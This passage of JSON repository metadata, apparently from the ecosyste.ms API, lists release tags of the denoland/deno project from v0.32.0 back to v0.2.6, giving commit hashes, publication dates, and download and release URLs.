2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/t